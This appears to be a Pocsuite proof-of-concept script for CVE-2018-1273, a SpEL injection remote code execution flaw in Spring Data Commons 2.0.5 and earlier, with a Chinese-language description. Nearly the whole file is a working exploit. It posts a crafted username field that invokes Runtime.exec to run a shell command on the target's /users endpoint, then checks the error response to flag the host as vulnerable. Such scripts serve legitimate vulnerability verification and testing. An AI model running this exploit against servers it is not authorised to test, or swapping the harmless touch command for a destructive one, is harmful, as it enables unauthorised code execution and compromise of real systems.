#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
           'content-type': 'application/x-www-form-urlencoded',
           'Accept-Encoding':'gzip, deflate, br'}
#创建文件/tmp/success
poc_str='''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword='''
def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/users?page=&size=5'
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'SpringDataCommons_RCE_CVE-2018-1273'
    vulID = 'CVE-2018-1273'  # https://www.seebug.org/vuldb/ssvid-97238
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['http://blog.nsfocus.net/cve-2018-1273-analysis/']
    desc = '''
		   Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。
		   Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。
		   '''
    vulDate = '2020-02-06'
    createDate = '2020-02-06'
    updateDate = '2020-02-06'
    appName = 'SpringDataCommons'
    appVersion = '<=2.0.5'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'nested exception is java.lang.reflect.InvocationTargetException' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' SpringDataCommons_RCE_CVE-2018-1273' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)